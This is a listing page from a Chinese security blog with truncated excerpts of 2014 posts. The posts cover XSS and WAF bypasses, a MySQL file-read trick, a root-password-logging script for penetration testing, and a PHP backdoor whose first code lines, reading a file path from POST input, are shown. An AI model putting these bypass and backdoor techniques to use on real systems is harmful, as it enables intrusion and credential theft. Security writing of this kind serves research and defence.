admin的文章

11年前 (2014-05-27) 2688浏览 0评论

背景 本文来自于之前我发的一篇微博： 不过写这篇文章并不是为了帮大家准备面试，而是想借这道题来介绍计算机和互联网的基础知识，让读者了解它们之间是如何关联起来的。 为了便于理解，我将整个过程分为了六个问题来展开。 第一个问题：从输入 URL 到浏览...

11年前 (2014-05-27) 1930浏览 0评论

转载请注明：jinglingshu的博客 » 安全宝工作原理...

11年前 (2014-05-26) 1489浏览 0评论

七月的夏天 早年我并不知道Python写的Web应用是怎么部署的，总觉得像PHP、ASP一样，仅仅提供一个语言级别的执行模块，直接嵌入Web服务器运行，甚至于直接对外提供带扩展名的URL都是自然而然的事情。 前一阵学习了Python，总是如别人一样，...

11年前 (2014-05-26) 1969浏览 0评论

一、漏洞类型说明 1、  高危漏洞 高危漏洞包括：SQL注入漏洞、XSS跨站脚本漏洞、页面存在源代码泄露、网站存在备份文件、网站存在包含SVN信息的文件、网站存在Resin任意文件读取漏洞。 SQL注入漏洞：网站程序忽略了对输入字符串中包含的SQL语...

11年前 (2014-05-26) 4067浏览 1评论

众所周知，Mysql的用户在没有File权限情况下是无法通过Load_file读文件 或者通过into dumpfile 或者into outfile去写文件，但是偶尔在一个网站上发现个小技巧，也就是通过load data local infile可...

11年前 (2014-05-25) 2454浏览 0评论

相信只要是从事软件开发， 多多少少都会涉及到数据包的抓取。常见的有网页数据抓取（即网页爬虫），应用程序数据包抓取等。网页数据抓取比较简单， 在chrome下可以非常方便的分析网页结构和数据请求；而应用程序数据包的抓取则相对复杂些， 通常需要配置代理...

11年前 (2014-05-25) 2312浏览 0评论

自己并不擅长xss，作为抛砖引玉的一篇总结文章，分享一下自己的见解，其实写出来感觉很惶恐。都是之前看M写的一些文章学到的姿势，在这里跪谢。 我这里的绕过侧重于白盒审计，所以不用各种测试测试很久，只用根据源码中的fliter规则写出合适的exp。 后端...

11年前 (2014-05-25) 1930浏览 0评论

在 以前，可能就许多互联网厂商来说，对于漏洞都没有一个直观的认识，更别说普通的网民了。今年以来，包括这次的OpenSSL或者上次的携程、支付宝等爆出 的漏洞，不管是厂商还是组件，都让大家对漏洞有了进一步的认识。从去年到今年以来，各种SRC遍地开花，...

11年前 (2014-05-25) 1722浏览 0评论

今天是一个特别的日子，早上大家还在讨论XP停止服务的事，到处是相关的新闻和文章，到了下午，到处都是OpenSSL的漏洞消息了。   OpenSSL与SSL安全协议   什么是SSL安全协议，我记得在10年我写过一篇简单介绍的文章，小谈...

11年前 (2014-05-25) 2663浏览 0评论

一、Start Apache 2 Server /启动apache服务 # /etc/init.d/apache2 start or $ sudo /etc/init.d/apache2 start 二、 Restart Apache 2 Serve...

11年前 (2014-05-25) 4229浏览 0评论

0×00 渗透的很多时候，找到的工具并不适用，自己码代码才是王道，下面三个程序都是渗透时在网络上找不到合适工具，自己辛苦开发的，短小使用，求欣赏，求好评。 0×01 记录root密码小工具 root.py #!/usr/bin/python imp...

11年前 (2014-05-25) 1948浏览 0评论

*本文阐述的漏洞已被上报锤子科技并已确认修补。 Smartisan OS是锤子科技推出基于Android定制的移动操作系统。该系统于去年3月27日在国家会议中心由罗永浩首次公布。在2014年4月11日发布V0.9.9.7 alpha版本中，系统新增...

11年前 (2014-05-25) 2800浏览 1评论

这个后门是在渗透某站时遇到的，贴代码： <?php $f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; $c = $_POST[&quo...

11年前 (2014-05-25) 2246浏览 0评论

XXX之前有提过multipart请求绕过各种WAF方式：360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一，貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了，不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文...

11年前 (2014-05-25) 2568浏览 0评论

转自：http://blog.internot.info/2014/05/sql-injection-on-ebaycomau-subdomain.html Whilst looking for some bugs in ebay, I came a...

11年前 (2014-05-24) 2412浏览 0评论

HTTPS那些事（一）HTTPS原理 楔子 谣言粉碎机前些日子发布的《用公共WiFi上网会危害银行账户安全吗？》， 文中介绍了在使用HTTPS进行网络加密传输的一些情况，从回复来看，争议还是有的。随着网络越来越普及，应用越来越广泛，一些网络安全问题...

11年前 (2014-05-24) 3868浏览 0评论

看到一篇文章《解开人人网登录密码的 RSA 加密》，文章中提到人人网为了避免密码的明文传输，使用了纯javascript实现的RSA库来对用户的密码进行加密传输。该javascript实现的RSA库的主页是：http://www.ohdave.com...

11年前 (2014-05-23) 2746浏览 1评论

转自：https://boj.blog.ustc.edu.cn/index.php/2014/03/ostc-2014-minutes/ 昨天受科大 LUG 之邀参加了 CSDN 主办的 2014 开源技术大会（OSTC），结合会上记的笔记和不靠谱...

11年前 (2014-05-23) 1983浏览 0评论

一直以来，电信通过HTTP劫持推送广告的方式已经存在了很多年了，这种手段至今并未停止。这种手段月光博客曾经有多次曝光，见《电信级的网络弹出广告》、《获取了电信恶意弹出广告的罪证》和《谁控制了我们的浏览器？》。虽然HTTP本身的不安全性导致有路由器控制...

11年前 (2014-05-23) 2357浏览 0评论

世界上有两种密码：一种是防止你的小妹妹偷看你的文件；另一种是防止当局阅读你的文件。 —— Bruce Schneier《应用密码学》 传说中的 “明文密码” 有两种形式：明文传输和明文存储。明文传输的密码不一定明文存储，明文存储的密码也不一定明文传...